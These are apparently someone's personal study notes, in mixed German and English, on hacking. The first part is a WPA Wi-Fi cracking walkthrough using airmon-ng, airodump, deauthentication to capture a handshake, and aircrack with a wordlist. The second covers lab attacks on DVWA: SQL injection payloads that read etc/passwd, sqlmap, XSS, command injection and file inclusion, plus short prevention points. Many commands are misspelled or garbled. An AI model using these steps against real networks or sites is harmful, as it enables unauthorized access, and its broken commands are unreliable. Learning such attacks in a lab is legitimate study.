############
Cacking WIFI
############

Tooles
######
acrige ng

Wlan Passwort
#############

.. code-block:: python

  #Monitor mode for network
  airmon -ng start wlan0

  #
  airodump -ng monwlan0

  # determine channel of network and mac address of the router

  # stop monitoring
  airmon -ng stop wlan0mon

  # auf channel 7 locken
  ifconfig wlan0 down # schaltet wifi aus
  iwconfig wlan0 channel 7
  ifconfig wlan0 up

  airmon -ng stat wlan0 7 #

  airodump -ng wlan0mon --channel 7 --bssid "RouterMac address" -w "logdatenpfad" --ig"magic parameter" # -w loggt in dateipfad

  #damit finden wir die client mac address
  #wenn handshakes gefunden werden werden diese angezeigt

  #replay packages of router and pretend to be the router
  #send
  # will disconnect client
  aireplay-ng --deauth 20 -a "Router mac " -c "client mac"--ignore-negative-one wlan0mon

  # will enable us to capture a handshake and save it in the logdatenpfad
  # rockyou wordlist
  # online wordlists openwall.net deutsche oder englische wordlist
  aircrack -ng -w usr/share/wordlists/rockyou -b "routermac" "logfile"#wordlist

  #nicht möglich zwischen falschen und richtigen handshakes zu testen

deauthenticaten funktioniert nicht bei allen wlan karten


Attacks on Webservers
#####################

DVWA
mit admin/password anmelden
setup create/reset Database
security level in dvwa security kategorie
mit view source code to checkout how its implemented

SQL Injection
-------------
nichtblind: rückmeldung
blind
check which db system is used by using error messages or with a kali tool

.. code-block:: ruby

  ' or 1=1 # ''
  ' union select null, scheme_name from information_schemata # get db name
  ' union select null, table_name from information_schemata.tables # get table names
  ' union select null, concat (table_name, 0x0a, column_name)
  #use concat to concatinate multiple parameters
  ' union all select file_load('etc/passwd'), null #'


  # with ecaping

  1 or 1=1 union select

Prevent SQL
___________

* richtig parsen
* kein feedback
* prepared statements

automatisiert
##############

.. code-block:: ruby

  sqlmap -u "http://172...url to check" --cockie= "" -tables


Crosssite scripting
-------------------

stored: wird auf de server gespeichert, man hinterlässt spuren
reflected: für einen Nutzer speziell prepariert und als url parameter mitgeschickt(mit url shortener verschleiern)

.. code-block:: javascript

  <script>alert("hallo")<script/>
  <script >

CSRF
----

man nutzt eine offene session


Command execution
-----------------

mit Semicolon zweites command anfügen
pipe nehmen

prevention
##########
change root envirement
oder application in docker container laufen lassen

File inclusion
##############

/etc/password als dateipfad angeben

lease privilage

user der script ausführt hat keinen zugriff auf andere Dokumente
root in apachee festlegen
